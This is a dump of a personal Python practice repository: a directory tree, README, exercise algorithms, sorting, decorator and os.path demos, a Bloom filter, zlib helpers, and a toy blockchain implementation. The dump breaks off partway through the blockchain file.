├── README.md ├── algorithms ├── others │ └── base_algorithm_que.py ├── sorted │ └── sorted_algorithms.py └── test.py ├── basics ├── decorator.py ├── os.py ├── test_bloomfilter.py ├── test_test_demo.py └── zlib.py ├── blockchains ├── blockchain.py ├── blockchain_node1.py ├── blockchain_node2.py ├── 待解决问题.txt └── 模拟挖矿过程.txt ├── data_process ├── db_operation.py ├── divide_words.py ├── pandas_operation.py └── word_cloud.py ├── interesting ├── __init__.py ├── apscheduler │ ├── a.ico │ └── testApscheduler.py ├── dingding_push │ ├── __init__.py │ ├── demo.py │ └── dingding_push_msg.py └── hongzha.py ├── other_files └── chromedriver │ └── chromedriver.exe ├── practice ├── __init__.py ├── leetcode │ ├── 237.py │ ├── 709.py │ ├── 771.py │ ├── 832.py │ └── 977.py └── technique │ ├── __init__.py │ ├── code_technique.py │ ├── config │ ├── __init__.py │ ├── ip_pool.txt │ ├── random_ip.py │ ├── test_comfig.py │ └── user_agent.py │ ├── db_operate.py │ ├── excel_operate.py │ ├── file_operate.py │ ├── pdf_operate.py │ ├── selenium_template.py │ ├── test_data │ ├── test.py │ └── test_excel.xlsx │ ├── word_operate.py │ └── zip_file_operate.py ├── project_directory_structure.txt └── spider ├── __init__.py ├── config ├── __init__.py ├── ipPool.txt ├── random_ip.py ├── test_comfig.py └── user_agent.py ├── configure ├── __init__.py ├── ipPool.txt ├── log.py ├── randomIp.py └── test.py ├── coroutine.py ├── down_doc_png.py ├── down_video ├── down_film.py ├── 参考.txt ├── 查看.ts文件.png └── 查看m3u8文件.png ├── ebook └── down_history_books.py ├── get_heml.py ├── get_html_new.py ├── get_meizi_image.py ├── get_url_data.py ├── gzh ├── GZH.py └── ip_pool.txt ├── kcb_info.py ├── movieReview ├── cleanData.py ├── cleanData.txt ├── film.py ├── filmComments.py ├── ipPool.txt ├── stopWords.txt ├── temp.txt ├── temp2.txt ├── test.csv └── test2.csv ├── news ├── __init__.py ├── get_news_url.py ├── new_pengpai.py ├── new_url.txt ├── re.txt └── wallstreetcn.py ├── pachong ├── geckodriver.log ├── 
get_dynamic_data.py ├── page_source.txt ├── result.csv ├── screenshot │ ├── 1.png │ └── bottom.jpg └── 笔记.txt ├── spider.zip ├── wechat ├── __init__.py ├── get_wechat_data_old.py └── get_wechat_data_simple.py └── weibo ├── __init__.py └── weibo_api.py /README.md: -------------------------------------------------------------------------------- 1 | # Python 2 | Python Related Work 3 | 1. algorithms 算法 4 | 2. basics 基础 5 | 3. blockchains 区块链 6 | 4. data_process 数据处理 7 | 5. practice 练习 8 | technique 9 | db_operation 数据库相关 10 | code_technique 代码技巧 11 | doc_operate 常规文件操作 12 | pdf_operate pdf操作 13 | word_operate word操作 14 | 6. spider 爬虫 15 | gzh 公众号 16 | wechat_data 微信数据 17 | config 爬虫一般配置 18 | down_video 下载视频 19 | get_news 下载新闻 20 | movie_review 爬取影评 21 | pachong 爬取直播 22 | weibo 测试微博 23 | 7. interesting 有趣内容 24 | apscheduler 定时器相关 25 | 8. otherfiles 其他 26 | -------------------------------------------------------------------------------- /algorithms/others/base_algorithm_que.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 基本经典算法 6 | 1. 菲波拉契数列问题 7 | 2. 判断素数问题 8 | 3. 判断水仙花数问题 9 | 4. 获取分数评级(嵌套条件运算符) 10 | 5. 正整数分解质因数 11 | 6. 最大公约数和最小公倍数 12 | 7. 统计字符串内容 13 | 8. 计算特殊表达式的和 求s=a+aa+aaa+aaaa+aa…a的值 14 | 9. 判断一个数是否是完数(一个数如果恰好等于它的因子之和,如6=1+2+3) 15 | 10.阶乘 求1+2!+3!+…+20!的和 16 | 11.判断回文数 17 | 12.四数取三,排列组合 18 | -------------------------------- 19 | @Time : 2018/11/26 20:30 20 | @File : base_algorithm_que.py 21 | @Software: PyCharm 22 | -------------------------------- 23 | @Author : lixj 24 | @contact : lixj_zj@163.com 25 | """ 26 | 27 | import math 28 | 29 | 30 | ######### 1. 
######### 1. Fibonacci sequence #########
class fibonacci(object):
    def __init__(self, num):
        # num: how many terms of the sequence to produce
        self.num = num

    # Build the full list -- O(n) extra space.
    def getFibonacciList_three(self):
        """Print the first ``num`` Fibonacci terms as a list."""
        result = [1, 1]
        for i in range(2, self.num):
            result.append(result[i - 1] + result[i - 2])
        # Fix: for num < 2 the old code always printed both seed terms.
        print(result[:self.num])

    # Print directly, bottom-up -- O(1) extra space, O(n) time.
    def getFibonacciList_two(self):
        one, two = 1, 1
        print(one, two, end="\t")
        for i in range(2, self.num):
            three = one + two
            one, two = two, three
            print(three, end="\t")


# Plain recursion -- exponential time, kept for comparison.
def getFibonacciList_one(num):
    """Return the num-th Fibonacci term (1, 1, 2, 3, ...)."""
    if num in [0, 1]:
        return 1
    return getFibonacciList_one(num - 1) + getFibonacciList_one(num - 2)


######### 2. Primality test #########
def isPrime(num):
    """Return True when ``num`` is a prime number.

    Fix: the original returned True for 0, 1 and negative values because
    the trial-division range is empty for them.
    """
    if num < 2:
        return False
    # +1 so that sqrt(num) itself is tested as a divisor
    for i in range(2, int(math.sqrt(num)) + 1):
        if num % i == 0:
            return False
    return True


######### 3. Narcissistic (Armstrong) numbers #########
def getDaffodil():
    """Print every three-digit number equal to the sum of the cubes of its digits."""
    beginNum = 101
    endNum = 1000
    for i in range(beginNum, endNum):
        a = i % 10          # units digit
        b = i // 10 % 10    # tens digit
        c = i // 100        # hundreds digit
        if a ** 3 + b ** 3 + c ** 3 == i:
            print(i)


######### 4. Score grading (nested conditional expression) #########
def getScoreSign(score):
    """Map a numeric score to a letter grade: >=90 A, >=60 B, else C."""
    return "A" if score >= 90 else "B" if score >= 60 else "C"


######### 5. Prime factorisation of a positive integer #########
def getPrimeNum(num):
    """Return the list of prime factors of ``num`` in ascending order."""
    n = 2
    result = []
    while num >= n:
        if num == n:
            # num itself is the last (largest) prime factor
            result.append(num)
            break
        elif num % n == 0:  # num can still be divided by n
            result.append(n)
            num //= n       # integer division keeps num an int
        else:
            n += 1          # advance to the next candidate divisor
    return result
######### 6. Greatest common divisor / least common multiple #########
# Euclid's algorithm: repeatedly replace the pair (small, large) by
# (large % small, small) until the smaller value reaches 0; the survivor
# is the GCD.  LCM = product of the two numbers / GCD.
def getMaxComDivisorAndMinComMultiple(num_one, num_two):
    """Return the greatest common divisor of two positive integers."""
    # Keep num_two as the larger of the pair.
    if num_one > num_two:
        num_two, num_one = num_one, num_two
    while num_one != 0:
        if num_one == num_two:  # equal numbers: the GCD is the number itself
            return num_two
        # The remainder is always smaller than the divisor, so it becomes
        # the new "small" value for the next round.
        num_one, num_two = num_two % num_one, num_one
    return num_two


######### 7. Character statistics #########
def countNum(string):
    """Count Chinese characters, letters, spaces, digits and other characters.

    :param string: input text
    :return: list of counts [chinese, alpha, space, digit, other]
    """
    result = [0, 0, 0, 0, 0]
    for char in string:
        # CJK range checked before isalpha(): isalpha() is True for Chinese too
        if u'\u4e00' <= char <= u'\u9fa5':
            result[0] += 1
        elif char.isalpha():
            result[1] += 1
        elif char.isspace():
            result[2] += 1
        elif char.isdigit():
            result[3] += 1
        else:
            result[4] += 1
    return result


######### 8. Sum of the series s = a + aa + aaa + aaaa + ... #########
def getNumSum(num, count):
    """Return (and print) a + aa + aaa + ... with ``count`` terms built from digit ``num``."""
    term = 0
    total = 0  # fix: renamed from ``sum``, which shadowed the builtin
    for i in range(count):
        term += num * 10 ** i  # term grows 3 -> 33 -> 333 -> ...
        total += term
    print(total)
    return total


######### 9. Perfect numbers (equal to the sum of their proper divisors, e.g. 6 = 1 + 2 + 3) #########
def isCompleteNum(num):
    """Return True when ``num`` equals the sum of its proper divisors."""
    divisor_sum = 0
    # Proper divisors of num never exceed num // 2.
    for i in range(1, num // 2 + 1):
        if num % i == 0:
            divisor_sum += i
    # Fix: drop the redundant ``True if ... else False``.
    return divisor_sum == num
######### 10. Sum 1 + 2! + 3! + ... + num! #########
def factorial(num):
    """Return the sum of factorials 1! + 2! + ... + num!."""
    total = 0
    running = 1  # invariant: running == one_num! after each multiplication
    for one_num in range(1, num + 1):
        running *= one_num
        total += running
    return total


def factorial_two(num):
    """Same series via functools.reduce; prints the result (demo variant)."""
    from functools import reduce
    total = 0
    for i in range(2, num + 2):  # reduce over range(1, i) yields (i-1)!
        total += reduce(lambda x, y: x * y, range(1, i))
    print(total)


######### 11. Palindrome test #########
def isNumberOfTracts(num):
    """Return True when ``num`` reads the same forwards and backwards.

    Fix: the original compared digit pairs in a loop whose ``else`` branch
    returned True as soon as one pair matched, so e.g. 1231 was reported
    as a palindrome.  Comparing against the reversed string checks every
    digit.
    """
    # Negative numbers and non-zero multiples of 10 can never be palindromes.
    if num < 0 or (num % 10 == 0 and num != 0):
        return False
    digits = str(num)
    return digits == digits[::-1]


######### 12. Pick three of four digits: permutations #########
# With digits 1..num, count the three-digit numbers whose digits are
# pairwise distinct (zero not involved).
def permutations(num):
    count = 0
    for i in range(1, num + 1):
        for j in range(1, num + 1):
            for k in range(1, num + 1):
                if i != j and j != k and i != k:
                    count += 1
                    print(i * 100 + j * 10 + k, i, j, k)
    print(count)


# itertools.combinations() for combinations; itertools.permutations() lists every ordering
def permutations_one(tar, num):
    """
    Print all ``num``-length permutations of the digits/characters of ``tar``.

    :param tar: target to permute (int or str)
    :param num: how many elements to pick
    """
    import itertools
    result = []
    for permutation in itertools.permutations(str(tar), num):
        # Fix: str.join instead of quadratic += on a name shadowing sum()
        joined = "".join(permutation)
        # isinstance() is the idiomatic type test (was ``tar.__class__ is int``)
        result.append(int(joined) if isinstance(tar, int) else joined)
    print(result)
菲波拉契数列问题 ######### 235 | num = 10 236 | fibonacci = fibonacci(num) 237 | for i in range(num): 238 | print(getFibonacciList_one(i), end="\t") 239 | fibonacci.getFibonacciList_two() 240 | fibonacci.getFibonacciList_three() 241 | 242 | ######### 2. isPrime ######### 243 | beginNum, endNum = 101, 200 244 | count = 0 245 | for i in range(beginNum, endNum): 246 | if isPrime(i): 247 | count += 1 248 | print(i, end=" ") 249 | print("总数:", count) 250 | 251 | ######### 3. 判断水仙花数 ######### 252 | getDaffodil() 253 | 254 | ######### 4. 获取分数评级(嵌套条件运算符-python无三目运算) ######### 255 | score = 60 256 | getScoreSign(score) 257 | 258 | ######### 5. 正整数分解质因数 ######### 259 | num = 12 260 | getPrimeNum(num) 261 | 262 | ######### 6. 最大公约数和最小公倍数 ######### 263 | maxComDivisor = getMaxComDivisorAndMinComMultiple(200, 12) 264 | minComMultiple = int(200 * 12 / maxComDivisor) 265 | print(maxComDivisor, minComMultiple) 266 | 267 | ######### 7. 统计字符串内容 ######### 268 | countNum("123test 哈哈 #@*") 269 | 270 | ######### 8. 计算特殊表达式的和 求s=a+aa+aaa+aaaa+aa…a的值 ######### 271 | getNumSum(num=3, count=6) 272 | 273 | ######### 9. 判断一个数是否是完数(一个数如果恰好等于它的因子之和,如6=1+2+3) ######### 274 | isCompleteNum(num=6) 275 | 276 | ######### 10. 求1+2!+3!+…+20!的和 ######### 277 | factorial(20) 278 | 279 | ######### 11. 判断回文数 ######### 280 | isNumberOfTracts(12345687654321) 281 | 282 | ######### 12. 四数取三,排列组合 ######### 283 | permutations(4) 284 | permutations_one(1230, 3) 285 | """ 286 | -------------------------------------------------------------------------------- /algorithms/sorted/sorted_algorithms.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 排序算法集合 6 | 1. 插入排序 7 | 2. 8 | 3. 9 | 4. 
class SortedAlgorithms(object):
    """A small collection of sorting algorithms."""

    def __init__(self):
        pass

    def straight_insertion_sort(self, ints):
        """
        Straight insertion sort.

        Idea:
            Take elements from the unsorted region one by one and slide
            each into its place inside the already-sorted prefix.
        Complexity:
            Worst case O(n^2); stable; efficient on small inputs.
        :param ints: list sorted in place
        :return: the sorted list (same object)
        """
        for idx in range(1, len(ints)):
            pivot = ints[idx]
            pos = idx
            # Shift every larger element of the sorted prefix one slot right.
            while pos > 0 and ints[pos - 1] > pivot:
                ints[pos] = ints[pos - 1]
                pos -= 1
            # Drop the pivot into the gap that opened up.
            ints[pos] = pivot
        return ints

    def straight_insertion_sort_optimization(self):
        """
        Insertion sort optimised with binary search -- not implemented yet.
        :return:
        """
        pass
""" 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 装饰器常见用法 6 | 参考网址:https://mp.weixin.qq.com/s/8z92pbhJV1ybfE6YZfvOuw?scene=25#wechat_redirect 7 | -------------------------------- 8 | @Time : 2019/8/14 14:10 9 | @File : decorator.py 10 | @Software: PyCharm 11 | -------------------------------- 12 | @Author : lixj 13 | @contact : lixj_zj@163.com 14 | """ 15 | 16 | import time 17 | 18 | 19 | ## 1. 简单 demo 20 | def decorator(func): 21 | """ 22 | 定义装饰器。调用含有该装饰器的函数时,先将这个函数做为参数传入该装饰器。 23 | :param func: 含有该装饰器的函数 24 | :return: 25 | """ 26 | 27 | def wrapper(*args, **kwargs): 28 | return func() 29 | 30 | return wrapper 31 | 32 | 33 | @decorator 34 | def function(): 35 | print("hello decorator") 36 | 37 | 38 | ## 2. 日志打印装饰器 39 | def logger(func): 40 | def wrapper(*args, **kwargs): 41 | print("开始执行:{}函数".format(func.__name__)) 42 | # 真正执行 43 | func(*args, **kwargs) 44 | print("执行:{}函数完毕".format(func.__name__)) 45 | 46 | return wrapper 47 | 48 | 49 | @logger 50 | def add(x, y): 51 | print("{}+{}={}".format(x, y, x + y)) 52 | 53 | 54 | ## 3. 时间计时器 55 | def timer(func): 56 | def wrapper(*args, **kwargs): 57 | begin_time = time.time() 58 | # 执行函数 59 | func(*args, **kwargs) 60 | cost_time = time.time() - begin_time 61 | print("程序耗时:{}秒".format(cost_time)) 62 | 63 | return wrapper 64 | 65 | 66 | @timer 67 | def test_timer_sleep(sleep_time): 68 | time.sleep(sleep_time) 69 | 70 | 71 | ## 4. 带参数的函数装饰器--两层嵌套 72 | def say_hello(contry): 73 | def wrapper(func): 74 | def deco(*args, **kwargs): 75 | if contry == "china": 76 | print("你好!") 77 | elif contry == "america": 78 | print("hello.") 79 | else: 80 | return 81 | # 真正执行函数 82 | func(*args, **kwargs) 83 | 84 | return deco 85 | 86 | return wrapper 87 | 88 | 89 | @say_hello("china") 90 | def xiaoming(): 91 | pass 92 | 93 | 94 | @say_hello("america") 95 | def jack(): 96 | pass 97 | 98 | 99 | ## 5. 
## 5. Advanced: class decorator without arguments
# A class-based decorator must implement __init__ and __call__:
# __init__ receives the decorated function, __call__ runs the wrapping logic.
class Logger(object):
    def __init__(self, func):
        # The decorated function.
        self.func = func

    def __call__(self, *args, **kwargs):
        print("[INFO]: the function {}() is running...".format(self.func.__name__))
        # Run the real function and propagate its result.
        return self.func(*args, **kwargs)


@Logger
def say_no_parameter(something):
    print("say {}!".format(something))


## 6. Advanced: class decorator with arguments
# Fix: this class was also named ``Logger`` and silently shadowed the class
# above, making the argument-less variant unreachable from this point on.
# Renamed to ``LevelLogger``.
# __init__ receives the decorator arguments; __call__ receives the function.
class LevelLogger(object):
    def __init__(self, level='INFO'):
        # Log-level label used in the message prefix.
        self.level = level

    def __call__(self, func):
        def wrapper(*args, **kwargs):
            print("[{}]: the function {}() is running...".format(self.level, func.__name__))
            # Fix: propagate the wrapped function's return value.
            return func(*args, **kwargs)

        return wrapper


@LevelLogger(level='WARNNING')
def say_with_parameter(something):
    print("say {}!".format(something))
## 7. Decorator built from a partial function and a class
# Python only requires a decorator to be a callable.  Plain functions,
# classes implementing __call__, and -- easily overlooked -- partial
# functions all qualify.
import time
import functools


class DelayFunc:
    def __init__(self, duration, func):
        # Seconds to wait before each call.
        self.duration = duration
        # The function decorated with @delay(duration=...).
        self.func = func

    def __call__(self, *args, **kwargs):
        print(f'Wait for {self.duration} seconds...')
        time.sleep(self.duration)
        return self.func(*args, **kwargs)


def delay(duration):
    """
    Decorator: postpone a function call by ``duration`` seconds.
    :param duration: delay in seconds
    :return: callable that wraps the target in a DelayFunc
    """
    # functools.partial saves defining yet another nested function here.
    return functools.partial(DelayFunc, duration)


# duration=2: wait two seconds before executing
@delay(duration=2)
def add_partial(a, b):
    return a + b


## 8. Decorating a class: singleton via a decorator
# ``singleton`` wraps instantiation so every call returns one shared
# instance per class name.

# Cache of created instances, keyed by class name.
instances = {}


def singleton(cls):
    """
    Turn ``cls`` into a singleton.
    :param cls: the class decorated with @singleton
    :return: factory returning the single shared instance
    """

    def get_instance(*args, **kw):
        cls_name = cls.__name__
        # Idiom fix: ``not in`` instead of ``not cls_name in``.
        if cls_name not in instances:
            # First call: build the real instance and cache it.
            instances[cls_name] = cls(*args, **kw)
        return instances[cls_name]

    return get_instance


@singleton
class User:
    def __init__(self, name):
        self.name = name
## 9. The ``wraps`` decorator
# functools provides ``wraps``, which copies metadata attributes from the
# wrapped function onto the wrapper so introspection (__name__ etc.) matches
# intuition.  ``wraps`` itself is actually a partial object.
from functools import update_wrapper

# Attributes copied from the wrapped function onto the wrapper.
WRAPPER_ASSIGNMENTS = ('__module__', '__name__', '__qualname__', '__doc__',
                       '__annotations__')


def wrapper(func):
    def inner_function():
        pass

    # Copy func's metadata onto inner_function (what functools.wraps does).
    update_wrapper(inner_function, func, assigned=WRAPPER_ASSIGNMENTS)
    return inner_function


@wrapper
def wrapped():
    pass


print(wrapped.__name__)  # prints "wrapped" thanks to update_wrapper


## 10. Built-in decorator: property
# A hand-rolled re-implementation of ``property`` showing the descriptor
# protocol underneath: @TestProperty turns a method into an attribute whose
# value is the method's return value, and exposes getter/setter/deleter
# to build new descriptors around replacement accessors.
class TestProperty(object):

    def __init__(self, fget=None, fset=None, fdel=None, doc=None):
        # fget/fset/fdel: accessor callables; doc: docstring of the attribute.
        self.fget = fget
        self.fset = fset
        self.fdel = fdel
        self.__doc__ = doc

    def __get__(self, obj, objtype=None):
        print("in __get__")
        if obj is None:
            # Accessed on the class, not an instance: return the descriptor.
            return self
        if self.fget is None:
            raise AttributeError
        return self.fget(obj)

    def __set__(self, obj, value):
        print("in __set__")
        if self.fset is None:
            raise AttributeError
        self.fset(obj, value)

    def __delete__(self, obj):
        print("in __delete__")
        if self.fdel is None:
            raise AttributeError
        self.fdel(obj)

    def getter(self, fget):
        print("in getter")
        # Return a new descriptor with the getter replaced.
        return type(self)(fget, self.fset, self.fdel, self.__doc__)

    def setter(self, fset):
        print("in setter")
        # Return a new descriptor with the setter replaced.
        return type(self)(self.fget, fset, self.fdel, self.__doc__)

    def deleter(self, fdel):
        print("in deleter")
        # Return a new descriptor with the deleter replaced.
        return type(self)(self.fget, self.fset, fdel, self.__doc__)
## 11. Decorators in practice: a call-timeout decorator
# Aborts the decorated call with TimeoutException when it runs longer than
# the allowed number of seconds.  Relies on SIGALRM, so it is Unix-only and
# only works in the main thread -- TODO confirm that matches deployment.
import signal


class TimeoutException(Exception):
    def __init__(self, error='Timeout waiting for response from Cloud'):
        Exception.__init__(self, error)


def timeout_limit(timeout_time):
    """
    Decorator factory: limit the wrapped call to ``timeout_time`` seconds.

    :param timeout_time: timeout in whole seconds
    :raises TimeoutException: when the alarm fires before the call returns
    """

    def wraps(func):
        def handler(signum, frame):
            raise TimeoutException()

        def deco(*args, **kwargs):
            # Remember the previous SIGALRM handler so we can restore it.
            previous = signal.signal(signal.SIGALRM, handler)
            signal.alarm(timeout_time)
            try:
                # Fix: propagate the wrapped function's return value.
                return func(*args, **kwargs)
            finally:
                # Fix: always cancel the alarm and restore the previous
                # handler, even when func raises; the original left a
                # pending alarm armed on any exception.
                signal.alarm(0)
                signal.signal(signal.SIGALRM, previous)

        return deco

    return wraps
import os
import shutil  # NOTE(review): imported but unused in the visible demos -- confirm before removing

# NOTE(review): this module is named ``os.py``; imported by name it can
# shadow the stdlib ``os`` module on sys.path -- consider renaming the file.

# Fix: raw string -- "\Z", "\P", "\B" are invalid escape sequences in a
# normal string literal and raise DeprecationWarning on modern Pythons.
current_path = r"D:\ZX_workspace\Python\Basics\osRelated.py"

# 1. Absolute path of the current file
print(os.path.abspath(__file__))
print(os.path.abspath("osRelated1.py"))

# 2. Absolute path of the directory containing the current file
print(os.path.dirname(__file__))
print(os.path.dirname(os.path.abspath(__file__)))
# os.path.sep is the platform separator ("\\" on Windows)
print(os.path.abspath(os.path.dirname(__file__) + os.path.sep + "."))
print(os.path.abspath(os.path.dirname(current_path) + os.path.sep + "."))

# 3. Change the working directory -- takes a directory path, not a file path
print(os.chdir(os.path.dirname(current_path)))

# 4. Join a directory path with a file name
print(os.path.join(os.path.abspath(os.path.dirname(__file__)), "aa.txt"))

# 5. Markers such as ``.``, ``..`` and separators are defined in ntpath.py
print(os.path.pardir)
class BloomFilter(object):
    """Simple Bloom filter over a fixed-size bit vector with three hash seeds."""

    def __init__(self, bit_size):
        # Number of bits in the vector.
        self.bit_size = bit_size
        # Allocate the bit vector and clear every bit.
        self.bit_array = bitarray(bit_size)
        self.bit_array.setall(0)

    def add_data(self, url):
        """
        Add ``url`` to the filter: set the bit at each of its hash positions.
        :param url: the URL to record
        """
        for position in self.get_positions(url):
            self.bit_array[position] = 1

    def is_contained(self, url):
        """
        Check whether ``url`` may already be in the filter.

        Fix: the original accumulated ``result and bit`` over every position,
        so it returned a raw bit value (0/1) instead of a bool and never
        short-circuited.  ``all()`` stops at the first clear bit and always
        returns a bool.
        :param url: the URL to test
        :return: True when every hash position is set (may be a false positive)
        """
        return all(self.bit_array[position] for position in self.get_positions(url))

    def get_positions(self, url):
        """
        Hash ``url`` with three different seeds and map each digest into the
        bit vector via modulo ``bit_size``.

        Different seeds act as three independent hash functions, reducing
        collisions between distinct inputs.
        mmh3.hash(key, seed=0, signed=True); the seed randomises the hash --
        see https://stackoverflow.com/questions/9241230 for the seed's role.
        :param url: the value to hash
        :return: list of three bit positions
        """
        position_one = mmh3.hash(url, 60) % self.bit_size
        position_two = mmh3.hash(url, 61) % self.bit_size
        position_three = mmh3.hash(url, 62) % self.bit_size
        return [position_one, position_two, position_three]
# NOTE(review): this module is named ``zlib.py``; run as a script it can
# shadow the stdlib ``zlib`` module on sys.path -- consider renaming the file.

# zlib.compress works on the bytes of a whole string at once
def str_zlib():
    """Fetch a page and print sizes before/after zlib compression."""
    req = requests.get("http://python.jobbole.com/81513/")
    message = req.text
    bytes_message = str.encode(message)
    compressed = zlib.compress(bytes_message, zlib.Z_BEST_COMPRESSION)
    decompressed = zlib.decompress(compressed)
    print("original string:", len(message))
    print("original bytes:", len(bytes_message))
    print("compressed:", len(compressed))
    print("decompressed:", len(decompressed))


# zlib.compressobj compresses a stream, suitable for file transfer
def file_compress(beginFile, zlibFile, level):
    """
    Stream-compress ``beginFile`` into ``zlibFile``.

    Fix: the original never closed either file handle; ``with`` guarantees
    both are closed even when an error occurs mid-stream.
    :param beginFile: source file path
    :param zlibFile: destination (compressed) file path
    :param level: zlib compression level (0-9)
    """
    compressobj = zlib.compressobj(level)
    with open(beginFile, "rb") as infile, open(zlibFile, "wb") as zfile:
        data = infile.read(1024)  # read in 1 KiB chunks
        while data:
            zfile.write(compressobj.compress(data))
            data = infile.read(1024)
        # flush() yields any bytes still buffered inside the compressor
        zfile.write(compressobj.flush())


def file_decompress(zlibFile, endFile):
    """
    Stream-decompress ``zlibFile`` into ``endFile``.

    Fix: the original never closed either file handle.
    :param zlibFile: compressed source file path
    :param endFile: destination file path
    """
    decompressobj = zlib.decompressobj()
    with open(zlibFile, "rb") as src, open(endFile, "wb") as dst:
        data = src.read(1024)
        while data:
            dst.write(decompressobj.decompress(data))
            data = src.read(1024)
        dst.write(decompressobj.flush())
"./endFile.txt" 69 | file_decompress(zlibFile, endFile) 70 | 71 | 72 | if __name__ == "__main__": 73 | main() 74 | 75 | 76 | -------------------------------------------------------------------------------- /blockchains/blockchain.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : 模拟区块链 6 | -------------------------------------- 7 | @File : blockchain.py 8 | @Time : 2018/4/24 16:51 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | import hashlib 17 | import json 18 | from time import time 19 | from urllib import parse 20 | from typing import Any, Dict, List, Optional 21 | from urllib.parse import urlparse 22 | from uuid import uuid4 23 | import requests 24 | from argparse import ArgumentParser 25 | 26 | # blockChain类用来管理链条,负责存储交易、加入新块等 27 | class blockChain(object): 28 | def __init__(self): 29 | self.chain = [] # 用于存储区块链 30 | self.current_transactions = [] # 用于存储交易记录 31 | self.nodes = set() # 用set来存储节点,避免重复添加节点(利用set的属性) 32 | 33 | # Create the genesis block 创建创世区块 34 | self.new_block(previous_hash = '1', proof = 100) 35 | 36 | 37 | # Creates a new block and adds it to the chain 生成新块并添加到区块链中 38 | # param proof: The proof given by the proof of work algorithm 39 | # param previous_hash: (Optional 可选) Hash of previous block 40 | # return: New block 41 | def new_block(self, proof, previous_hash: Optional[str]) -> Dict[str, Any]: 42 | # block 43 | block = { 44 | 'index': len(self.chain) + 1, 45 | 'timestamp': time(), 46 | 'transactions': self.current_transactions, 47 | 'proof': proof, 48 | 'previous_hash': previous_hash or self.hash(self.chain[-1]), 49 | } 50 | 51 | # Reset the current list of transactions 将交易加入到区块后重置交易记录。目的:在新的区块中打包记录新的交易情况,不能含有之前的交易记录 52 | self.current_transactions = 
[] 53 | 54 | # Add the new block to the list of chain 55 | self.chain.append(block) 56 | 57 | return block 58 | 59 | 60 | # Adds a new transaction to the list of transactions 61 | # 生成新的交易记录添加到交易列表中,新的交易记录将加入到下一个待挖的区块中,并返回该交易记录将被添加到的下一个待挖区块的索引 62 | # param sender: Address of the sender 发送者地址 63 | # param recipient: Address of the recipient 接收者地址 64 | # param amount: Amount 发送比特币的数量 65 | # return: The index of the block that will hold this transaction 66 | def new_transaction(self, sender: str, recipient: str, amount: int) -> int: 67 | self.current_transactions.append({ 68 | "sender": sender, 69 | "recipient": recipient, 70 | "amount": amount 71 | }) 72 | return self.last_block['index'] + 1 73 | 74 | 75 | # Hashes a block 生成块的SHA-256 hash值 76 | # param block: block 77 | # return: Hash 78 | @staticmethod # 静态方法 79 | def hash(block: Dict[str, Any]) -> str: 80 | block_string = json.dumps(block, sort_keys=True).encode() # 序列化列表为json字符串格式 81 | return hashlib.sha256(block_string).hexdigest() # hash.hexdigest()生成十六进制数据字符串值 82 | 83 | 84 | # Returns the last block in the chain 85 | @property # 将一个方法变成属性调用 86 | def last_block(self) -> Dict[str, Any]: 87 | return self.chain[-1] 88 | 89 | 90 | # 简单工作量证明: 寻找一个数proof,使得它与前一个区块的工作量证明值(last_proof)拼接成的字符串的 Hash 值(hash(last_proof, proof))以 4 个零开头。 91 | # param last_proof: 前一个区块的工作量证明值 92 | # return: proof 算力,工作量证明 93 | def proof_of_work(self, last_proof: int) -> int: 94 | proof = 0 95 | while self.valid_proof(last_proof, proof) is False: 96 | proof += 1 97 | return proof 98 | 99 | 100 | # 验证证明: hash(last_proof, proof)是否以四个零开头? 
101 | # param last_proof: Previous proof 前一个区块的工作量证明值 102 | # param proof: Current Proof 当前区块的工作量证明值 103 | # return: True is current, false if not 104 | @staticmethod 105 | def valid_proof(last_proof: int, proof: int) -> bool: 106 | guess = f'{last_proof}{proof}'.encode() 107 | guess_hash = hashlib.sha256(guess).hexdigest() 108 | return guess_hash[:4] == "0000" 109 | 110 | 111 | # 一致性(共识):注册节点,在多个节点中添加一个新的节点 112 | # param address: Address of node. Eg. 'http://192.168.0.5:5000' 113 | # return: None 114 | def register_node(self, address): 115 | parsed_url = urlparse(address) 116 | self.nodes.add(parsed_url.netloc) # 添加节点的地址和端口号,根据urlparse解析结果 117 | 118 | 119 | # Determine if a given blockchain is valid 检查是否是有效链,遍历每个块验证hash和proof 120 | # param chain: A blockchain 区块链列表 121 | # return: True if valid, false if not 122 | def valid_chain(self, chain: List[Dict[str, Any]]) -> bool: 123 | last_block = chain[0] 124 | current_index = 1 125 | 126 | while current_index < len(chain): 127 | block = chain[current_index] 128 | print(f'{last_block}') 129 | print(f'{block}') 130 | print("\n------------------\n") 131 | 132 | # Check that the hash of the block is correct 检测当前块是否正确可用。依据:当前块的previous_hash值是否等于前一个块的hash值 133 | if block['previous_hash'] != self.hash(last_block): 134 | return False 135 | 136 | # Check that the proof of work is correct 检测工作量证明是否正确 137 | if not self.valid_proof(last_block['proof'], block['proof']): 138 | return False 139 | 140 | last_block = block 141 | current_index += 1 142 | 143 | return True 144 | 145 | 146 | # 共识算发解决冲突,使用网络中最长的链 147 | # return: 如果链被取代返回True,否则返回False 148 | def resolve_conflicts(self) -> bool: 149 | # 获取所有临近节点,nodes包含网络中的所有节点内容 150 | neighbours = self.nodes 151 | new_chain = None 152 | 153 | # We're only looking for chains longer than ours 154 | max_length = len(self.chain) 155 | 156 | # Grab and verify the chains from all the nodes in our network 157 | # 遍历所有邻居节点,并验证链的有效性,如果发现有效更长链,则替换掉自己的链 158 | for node in neighbours: 159 | response = 
